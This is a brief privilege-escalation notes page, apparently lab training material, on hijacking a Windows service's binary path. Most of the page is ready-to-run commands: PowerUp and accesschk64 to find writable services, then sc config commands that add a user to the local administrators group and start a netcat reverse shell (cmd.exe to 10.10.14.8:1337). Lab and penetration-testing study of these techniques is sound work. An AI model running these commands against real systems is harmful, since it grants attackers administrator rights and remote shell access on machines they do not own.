Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation using PowerUp

Run PowerUp on machine

. .\PowerUp.ps1
Invoke-AllChecks
TCM Windows Priv Esc on Try Hack Me

Change the binary path

sc config daclsvc binpath= "net localgroup administrators Greg /add"
sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

sc start dacl

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe --accept-eula -uwcv Everyone *
TCM Windows Priv Esc on Try Hack Me
accesschk64.exe -uwcv daclsvc
TCM Windows Priv Esc on Try Hack Me

Query the service

sc qc daclsvc
TCM Windows Priv Esc on Try Hack Me

Changing the binary path is the same as the last method

PreviousService PermissionsNextUnquoted Service Paths

Last updated

Was this helpful?